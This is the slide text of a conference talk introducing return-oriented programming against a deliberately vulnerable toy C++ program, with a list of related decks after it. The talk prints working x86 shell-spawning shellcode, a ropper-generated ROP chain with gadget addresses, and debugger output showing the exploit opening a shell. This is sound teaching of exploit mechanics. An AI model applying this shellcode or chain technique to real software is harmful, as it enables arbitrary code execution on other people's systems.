SlideShare a Scribd company logo

Return Oriented Programming, an introduction

Patricia Aas
Patricia Aas

Return Oriented Programming (ROP) is an exploitation technique that folks have often heard of, but don't know the mechanics of. In this talk you will learn how it works, and we will go through how it can be used to execute code in contexts where the stack is not executable.

Software
1 of 61
Download to read offline
1 Turtle Sec @pati_gallardo Warning! This presentation has A LOT of assembly Run while you have the chance
2 Return Oriented Programming an introduction NDC Security 2023 Patricia Aas Turtle Sec
3 @pati_gallardo Patricia Aas - Trainer & Consultant C++ Programmer, Application Security Currently : TurtleSec Previously : Vivaldi, Cisco Systems, Knowit, Opera Software Master in Computer Science Pronouns: she/they Turtle Sec
4 @pati_gallardo Semi-Artisanal ROP
5 TurtleSec @pati_gallardo 1. void launch_missiles(int n) { 2. printf("Launching %d missilesn", n); 3. } 4. 5. void authenticate_and_launch() { 6. int n_missiles = 2; 7. bool allowaccess = false; 8. char response[110]; 9. printf("Secret: "); 10. std::cin >> response; 11. 12. if (strcmp(response, "Joshua") == 0) 13. allowaccess = true; 14. 15. if (allowaccess) { 16. puts("Access granted"); 17. launch_missiles(n_missiles); 18. } 19. 20. if (!allowaccess) 21. puts("Access denied"); 22. } 23. 24. int main() { 25. puts("WarGames MissileLauncher v0.1"); 26. authenticate_and_launch(); 27. puts("Operation complete"); 28. } target.cpp @olvemaudal @pati_gallardo The application
6 TurtleSec @pati_gallardo Secret: Access Granted Operation complete Launching missiles Access Denied “David” “Joshua” The Programmers Mental State Machine
7 TurtleSec @pati_gallardo target.cpp 1. void launch_missiles(int n) { 2. printf("Launching %d missilesn", n); 3. } 4. 5. void authenticate_and_launch() { 6. int n_missiles = 2; 7. bool allowaccess = false; 8. char response[110]; 9. printf("Secret: "); 10. std::cin >> response; 11. 12. if (strcmp(response, "Joshua") == 0) 13. allowaccess = true; 14. 15. if (allowaccess) { 16. puts("Access granted"); 17. launch_missiles(n_missiles); 18. } 19. 20. if (!allowaccess) 21. puts("Access denied"); 22. } 23. 24. int main() { 25. puts("WarGames MissileLauncher v0.1"); 26. authenticate_and_launch(); 27. puts("Operation complete"); 28. } The vulnerability Stack allocated buffer Stack Buffer Overflow @pati_gallardo
8 TurtleSec @pati_gallardo Secret: Access Granted Operation complete Launching missiles Access Denied “David” “Joshua” Weird State “globalthermonuclearwar” Terminate The Weird Machine (imagine a smaller buffer)
9 @pati_gallardo Our x86 32-bit shellcode for Linux
10 TurtleSec @pati_gallardo Shellcode Piece of code, typically in machine code, that is delivered and executed as a part of an exploit. Called “shellcode” because a traditional use was to start a shell, for example sh. In real exploits it will deliver some kind of mechanism for further (remote) compromise of the system.
11 TurtleSec @pati_gallardo Shellcode - code that gives you shell int execve(const char *filename, char *const argv[], char *const envp[]); Target Process Vulnerable Program Target Process /bin/sh Shellcode
12 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
13 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } Write C code for shellcode TurtleSec shellcode.c execve open close
14 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
15 TurtleSec @pati_gallardo $ gcc -Wno-incompatible-pointer-types -m32 -o shellcode shellcode.c $ ./shellcode $ Test C code for shellcode
16 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
17 TurtleSec @pati_gallardo ebx eax ax ah al 32 16 8 bx bh bl ecx cx ch cl edx dx dh dl x86 32-bit Linux syscall convention eax Syscall number ebx 1. argument ecx 2. argument edx 3. argument Registers
18 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c close
19 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x06 unsigned int fd close - calling convention 1. int fd = 0; 2. close(fd); Not in use
20 TurtleSec @pati_gallardo eax Syscall number 0x06 ebx 1. argument unsigned int fd close asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x06nt" // Set eax to syscall number (0x06) 3. "xor ebx, ebxnt" // Zero out ebx - file descriptor 4. "int 0x80nt" // Invoke syscall
21 TurtleSec @pati_gallardo 1. 2. 3. 4. mov eax, 0x06 xor ebx, ebx xor eax, eax eax 0x00 eax 0x06 ebx 0x00 Syscall Registers eax : Syscall number ebx : unsigned int fd int 0x80 close Register State Instructions
22 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c open
23 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x05 const char *filename int flags umode_t mode open - calling convention 1. const char *filename = "/dev/tty"; 2. int flag = O_RDONLY; 3. open(filename, flag);
24 TurtleSec @pati_gallardo esp sp stack pointer 32 16 Stack manipulation As instructions like push and pop are executed the stack pointer register (esp) is updated so it points to the "top of the stack"
25 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x05 const char *filename int flags umode_t mode open asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x05nt" // Set eax to syscall number (0x05) 3. "xor ebx, ebxnt" // Zero out 4. "push ebxnt" // Push null terminator 5. "mov ebx, 0x7974742fnt" // "ytt/" 6. "push ebxnt" // Part two of the string 7. "mov ebx, 0x7665642fnt" // "ved/" 8. "push ebxnt" // Part one of the string 9. "mov ebx, espnt" // Put pointer in ebx 10. "xor ecx, ecxnt" // Zero out 11. "xor edx, edxnt" // Zero out 12. "int 0x80nt" // Invoke syscall
26 TurtleSec @pati_gallardo 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. mov eax, 0x05 xor ebx, ebx push ebx mov ebx, 0x7974742f xor ecx, ecx mov ebx, esp push ebx mov ebx, 0x7665642f push ebx xor edx, edx xor eax, eax 0x00 0x00 0x00 0x00 0x79 y 0x74 t 0x74 t 0x2f / 0x76 v 0x65 e 0x64 d 0x2f / ecx 0x00 eax 0x00 eax 0x05 ebx 0x00000000 Stack Syscall Registers edx : umode_t mode eax : Syscall number ebx : const char *filename ecx : int flags int 0x80 ebx 0x7974742f ebx 0x7665642f ebx = esp ecx 0x00 O_RDONLY open
27 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c execve
28 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x0b const char *name const char *const *argv const char *const *envp execve - calling convention 1. const char *name = "/bin/sh"; 2. char *const *argv = NULL; 3. char *const *envp = NULL; 4. execve(name, argv, envp);
29 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x0b const char *name const char *const *argv const char *const *envp execve asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x0bnt" // Set eax to syscall number (0x0b) 3. "xor ebx, ebxnt" // Zero out 4. "push ebxnt" // Push null terminator 5. "mov ebx, 0x68732f2fnt" // "hs//" 6. "push ebxnt" // Part two of the string 7. "mov ebx, 0x6e69622fnt" // "nib/" 8. "push ebxnt" // Part one of the string 9. "mov ebx, espnt" // Put pointer in ebx 10. "xor ecx, ecxnt" // Zero out 11. "xor edx, edxnt" // Zero out 12. "int 0x80nt" // Invoke syscall
30 TurtleSec @pati_gallardo 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. mov eax, 0x0b xor ebx, ebx push ebx mov ebx, 0x68732f2f xor ecx, ecx mov ebx, esp push ebx mov ebx, 0x6e69622f push ebx xor edx, edx xor eax, eax 0x00 0x00 0x00 0x00 0x68 h 0x73 s 0x2f / 0x2f / 0x6e n 0x69 i 0x62 b 0x2f / ecx 0x00 eax 0x00 eax 0x0b ebx 0x00000000 Stack Syscall Registers edx : const char *const *envp eax : Syscall number ebx : const char *name ecx : const char *const *argv int 0x80 ebx 0x68732f2f ebx 0x6e69622f ebx = esp ecx 0x00 execve
31 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
32 TurtleSec @pati_gallardo 1. int main(void) { 2. __asm__( 3. ".intel_syntax noprefixnt" 4. "xor eax, eaxnt" // Zero out 5. "mov eax, 0x06nt" // Set eax to syscall number (0x06) 6. "xor ebx, ebxnt" // Zero out ebx - file descriptor 7. "int 0x80nt" // Invoke syscall 8. "xor eax, eaxnt" // Zero out 9. "mov eax, 0x05nt" // Set eax to syscall number (0x05) 10. "xor ebx, ebxnt" // Zero out 11. "push ebxnt" // Push null terminator 12. "mov ebx, 0x7974742fnt" // "ytt/" 13. "push ebxnt" // Part two of the string 14. "mov ebx, 0x7665642fnt" // "ved/" 15. "push ebxnt" // Part one of the string 16. "mov ebx, espnt" // Put pointer in ebx 17. "xor ecx, ecxnt" // Zero out 18. "xor edx, edxnt" // Zero out 19. "int 0x80nt" // Invoke syscall 20. "xor eax, eaxnt" // Zero out 21. "mov eax, 0x0bnt" // Set eax to syscall number (0x0b) 22. "xor ebx, ebxnt" // Zero out 23. "push ebxnt" // Push null terminator 24. "mov ebx, 0x68732f2fnt" // "hs//" 25. "push ebxnt" // Part two of the string 26. "mov ebx, 0x6e69622fnt" // "nib/" 27. "push ebxnt" // Part one of the string 28. "mov ebx, espnt" // Put pointer in ebx 29. "xor ecx, ecxnt" // Zero out 30. "xor edx, edxnt" // Zero out 31. "int 0x80nt" // Invoke syscall 32. ); 33. } execve open close shellcode_asm.c @pati_gallardo
33 TurtleSec @pati_gallardo $ clang -m32 -o shellcode_asm shellcode_asm.c $ ./shellcode_asm $ Test asm code for shellcode
34 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
35 TurtleSec @pati_gallardo ROP Return Oriented Programming When your stack is not executable
36 TurtleSec @pati_gallardo Foundational idea: The ret instruction transfers execution to the (return) address located on the stack
37 TurtleSec @pati_gallardo <addr 1> <addr 1> eax stack ptr Stack Registers RX Memory Instruction ptr <addr 1> xor eax, eax; ret; 0x00000000 <addr 2> stack ptr A ret instruction is being executed 1. ret
38 TurtleSec @pati_gallardo Rest of Rop Chain Return address Stack allocated buffer The Stack Buffer Overflow Gadget 1 addr Gadget 2 addr Gadget 3 addr Gadget 4 addr Gadget 5 addr Gadget 6 addr RX Memory <instructions>; ret; [0] : PADDING [1] : PADDING [2] : PADDING [3] : PADDING [4] : Gadget 1 addr [5] : Gadget 2 addr [6] : Gadget 3 addr [7] : Gadget 4 addr [8] : Gadget 5 addr [9] : Gadget 6 addr <instructions>; ret; <instructions>; ret; <instructions>; ret; <instructions>; ret; <instructions>; ret; Stack at time of overflow
39 TurtleSec @pati_gallardo Put it all into the exploit string Padding ROP Chain Gadget 1 Gadget 3 Gadget 2 Gadget 5 Gadget 4 ROP Chain
40 TurtleSec @pati_gallardo 1. #!/usr/bin/env python2 2. from struct import pack 3. 4. rop = '' 5. rop += 'x90'*130 # Use pattern_create/offset 6. 7. # TODO : Put in ROP chain here 8. 9. print(rop) Print ROP Chain Padding rop_chain.py @pati_gallardo Script
41 TurtleSec Terminal $ ropper --file target --chain execve --badbytes 00090b20 [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] filtering badbytes... 100% [LOAD] removing double gadgets... 100% [INFO] ROPchain Generator for syscall execve: [INFO] write command into data section eax 0xb ebx address to cmd ecx address to null edx address to null [INFO] Try to create chain which fills registers without delete content of previous filled registers [*] Try permuation 1 / 24 [INFO] Look for syscall gadget [INFO] syscall gadget found [INFO] generating rop chain Using ropper to find create a ROP chain
42 Terminal TurtleSec #!/usr/bin/env python # Generated by ropper ropchain generator # from struct import pack p = lambda x : pack('I', x) IMAGE_BASE_0 = 0x08048000 # 14e751855dc7dea49f8c9c0e10a22363f36ee225cb9bfee3b663fa039ac8a9ea rebase_0 = lambda x : p(x + IMAGE_BASE_0) rop = '' [... ROP CHAIN ...] print(rop) [INFO] rop chain generated! Using ropper to find create a ROP chain
43 Terminal TurtleSec rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; rop += '//bi' rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; rop += rebase_0(0x001ca060) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret; rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; rop += 'n/sh' rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; rop += rebase_0(0x001ca064) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret; rop += rebase_0(0x0000ddf4) # 0x08055df4: xor eax, eax; ret; rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; rop += rebase_0(0x001ca068) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret; rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret; rop += rebase_0(0x001ca060) rop += rebase_0(0x00004c88) # 0x0804cc88: pop ecx; ret; rop += rebase_0(0x001ca068) rop += rebase_0(0x000f9715) # 0x08141715: pop edx; xor eax, eax; pop edi; ret; rop += rebase_0(0x001ca068) rop += p(0xdeadbeef) rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; rop += p(0xfffffff5) rop += rebase_0(0x000df9d3) # 0x081279d3: neg eax; ret; rop += rebase_0(0x00113f80) # 0x0815bf80: int 0x80; ret; The ROP Chain 1 2 3 4 5 7 6 8 9
44 TurtleSec @pati_gallardo 1. 0x000ae1aa 2. 0x000a2c66 3. 0x0001730c 4. 0x08055df4 5. 0x0000101e 6. 0x00004c88 7. 0x000f9715 8. 0x000df9d3 9. 0x00113f80 pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; pop ecx; ret; int 0x80; ret; neg eax; ret; pop edx; xor eax, eax; pop edi; ret; pop eax; ret; ROP chain gadgets pop ebx; ret;
45 TurtleSec @pati_gallardo 0x000ae1aa 0x000a2c66 0x0001730c pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; pop eax; ret; 0x0001730c 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef 0x001ca060 0x000a2c66 '//bi' 0x000ae1aa eax ebx edx esi edi ebp stack ptr '//bi' stack ptr 0x001ca060 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x000ae1aa 0x000a2c66 0x0001730c
46 TurtleSec @pati_gallardo 0x000ae1aa 0x000a2c66 0x0001730c pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; pop eax; ret; 0x0001730c 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef 0x001ca064 0x000a2c66 'n/sh' 0x000ae1aa eax ebx edx esi edi ebp stack ptr 'n/sh' stack ptr 0x001ca064 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x000ae1aa 0x000a2c66 0x0001730c 'n/sh'
47 TurtleSec @pati_gallardo 0x0000ddf4 0x000a2c66 0x0001730c pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; 0x0001730c 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef 0x001ca068 0x000a2c66 0x0000ddf4 eax ebx edx esi edi ebp stack ptr 0x00000000 stack ptr 0x001ca068 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x0000ddf4 0x000a2c66 0x0001730c 'n/sh' 0x00000000
48 TurtleSec @pati_gallardo 0x0000101e 0x00004c88 0x000f9715 0x000ae1aa 0x000df9d3 0x000df9d3 0xfffffff5 0x000ae1aa 0xdeadbeef 0x001ca068 0x000f9715 0x001ca068 0x00004c88 0x0000101e eax ebx ecx edx edi stack ptr stack ptr stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x0000101e 0x00004c88 0x000f9715 'n/sh' pop ebx; ret; pop ecx; ret; pop edx; xor eax, eax; pop edi; ret; pop eax; ret; neg eax; ret; 0x001ca068 0x001ca068 0xdeadbeef stack ptr 0x000ae1aa 0xfffffff5 stack ptr 0x000df9d3 0x00000000 0x001ca060 0x0b 0x001ca060
49 TurtleSec @pati_gallardo 0x00113f80 0x00113f80 eax ebx ecx edx stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x00113f80 'n/sh' int 0x80; ret; 0x00000000 0x001ca068 0x001ca068 0xfffffff5 0x00000000 0x001ca060 0x0b Syscall Registers edx : const char *const *envp eax : Syscall number ebx : const char *name ecx : const char *const *argv
50 @pati_gallardo Finding Gadgets
51 TurtleSec @pati_gallardo 1. 0x000ae1aa 8. 0x000df9d3 9. 0x00113f80 close gadgets pop eax; ret; neg eax; ret; int 0x80; ret; 1. # 1. Zero out ebx 2. # TODO 3. 4. # 2. Put value in eax ( -0xfa = 0x06 ) 5. rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; 6. rop += p(0xfffffffa) 7. 8. # 3. Negate value in eax 9. rop += rebase_0(0x000df9d3) # 0x081279d3: neg eax; ret; 10. 11. # 4. Syscall 12. rop += rebase_0(0x00113f80) # 0x0815bf80: int 0x80; ret; Missing: xor ebx, ebx; ret; Syscall Registers eax : Syscall number ebx : unsigned int fd
52 TurtleSec @pati_gallardo 1. 0x000ae1aa 2. 0x000a2c66 3. 0x0001730c 4. 0x08055df4 5. 0x0000101e 8. 0x000df9d3 9. 0x00113f80 pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; int 0x80; ret; neg eax; ret; pop eax; ret; open gadgets pop ebx; ret; 1. # 11. Zero out ecx 2. # TODO 3. 4. # 12. Zero out edx 5. # TODO Missing: xor ecx, ecx; ret; Missing: xor edx, edx; ret;
53 TurtleSec @pati_gallardo 1. 0x000ae1aa 2. 0x000a2c66 3. 0x0001730c 4. 0x08055df4 5. 0x0000101e 6. 0x00004c88 7. 0x000f9715 8. 0x000df9d3 9. 0x00113f80 pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; pop ecx; ret; int 0x80; ret; neg eax; ret; pop edx; xor eax, eax; pop edi; ret; pop eax; ret; execve gadgets (from gen ROP chain) pop ebx; ret;
54 TurtleSec @pati_gallardo Missing 3 gadgets xor ebx, ebx; ret; xor ecx, ecx; ret; xor edx, edx; ret;
55 Terminal TurtleSec $ ropper --file target --search "xor ebx, ebx" [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] removing double gadgets... 100% [INFO] Searching for gadgets: xor ebx, ebx [INFO] File: target 0x0811e009: xor ebx, ebx; jmp edx; 0x080ee378: xor ebx, ebx; mov eax, ebx; pop ebx; pop esi; pop edi; ret; 0x0815b675: xor ebx, ebx; mov eax, ecx; int 0x80; 0x080f8a7e: xor ebx, ebx; mov eax, edx; int 0x80; 0x0816abcb: xor ebx, ebx; mov esi, 8; mov dword ptr [esp + 0xc], edx; mov eax, 0xaf; lea ecx, [ecx - 0x5c874]; call dword ptr gs:[0x10]; 0x080b4fce: xor ebx, ebx; movsx eax, al; pop ecx; push eax; push esi; call dword ptr [edx + 8]; 0x08168060: xor ebx, ebx; movzx eax, byte ptr [edi + eax - 0x20]; mov edi, dword ptr [esp + 0xc]; mov eax, dword ptr [edi + eax*4 - 0x4554]; jmp eax; 0x081680ac: xor ebx, ebx; movzx eax, byte ptr [edx + eax - 0x20]; mov eax, dword ptr [edi + eax*4 - 0x4554]; jmp eax; 0x0807466c: xor ebx, ebx; push eax; push edi; call dword ptr [edx + 8]; 0x080d5b4d: xor ebx, ebx; push ecx; call dword ptr [eax + 0x18]; 0x0808a868: xor ebx, ebx; push edx; push edi; call dword ptr [eax + 0x18]; 0x0804cc9a: xor ebx, ebx; ret;
56 TurtleSec @pati_gallardo All 3 are present in the binary xor ebx, ebx; ret; xor ecx, ecx; ret; xor edx, edx; ret; 0x0804cc9a 0x0804ccad 0x0804ccc0
57 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
58 $ hello Terminal TurtleSec $ ./rop_chain.py > rop_chain_file $ gdb -q target Reading symbols from target... (gdb) r < rop_chain_file Starting program: target < advanced_ropper_file WarGames MissileLauncher v0.1 Secret: Access granted Launching -1869574000 missiles Access denied process 3279834 is executing new program: /usr/bin/dash [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". $ Test ROP Chain
59 @pati_gallardo We go shel ! Than Yo !
60 @pati_gallardo Questions? Photos from pixabay.com Patricia Aas, TurtleSec Turtle Sec
61 Turtle Sec @pati_gallardo I'm "sorry" <3

Recommended

NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfNDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
Patricia Aas
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
Mikhail Sosonkin
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
Ajin Abraham
 
3
33
3
Marat Vyshegorodtsev
 
Marat-Slides
Marat-SlidesMarat-Slides
Marat-Slides
Marat Vyshegorodtsev
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Alexandre Moneger
 

Recommended

NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfNDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
Patricia Aas
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
Mikhail Sosonkin
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
Ajin Abraham
 
3
33
3
Marat Vyshegorodtsev
 
Marat-Slides
Marat-SlidesMarat-Slides
Marat-Slides
Marat Vyshegorodtsev
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Alexandre Moneger
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
Alexandre Moneger
 
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
Asuka Nakajima
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Vincenzo Iozzo
 
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
GangSeok Lee
 
SFO15-500: VIXL
SFO15-500: VIXLSFO15-500: VIXL
SFO15-500: VIXL
Linaro
 
Exploiting buffer overflows
Exploiting buffer overflowsExploiting buffer overflows
Exploiting buffer overflows
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Offensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with PythonOffensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with Python
Malachi Jones
 
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to usThat Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
takesako
 
Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)
Giovanni Bechis
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
linuxlab_conf
 
Shellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringShellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse Engineering
Sumutiu Marius
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
camsec
 
Flashback, el primer malware masivo de sistemas Mac
Flashback, el primer malware masivo de sistemas MacFlashback, el primer malware masivo de sistemas Mac
Flashback, el primer malware masivo de sistemas Mac
ESET Latinoamérica
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Priyanka Aash
 
Advanced Debugging Using Java Bytecodes
Advanced Debugging Using Java BytecodesAdvanced Debugging Using Java Bytecodes
Advanced Debugging Using Java Bytecodes
Ganesh Samarthyam
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitch
Felipe Prado
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
Moabi.com
 
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
Mr. Vengineer
 
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
CODE BLUE
 
Telling a story
Telling a storyTelling a story
Telling a story
Patricia Aas
 
I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)I can't work like this (KDE Academy Keynote 2021)
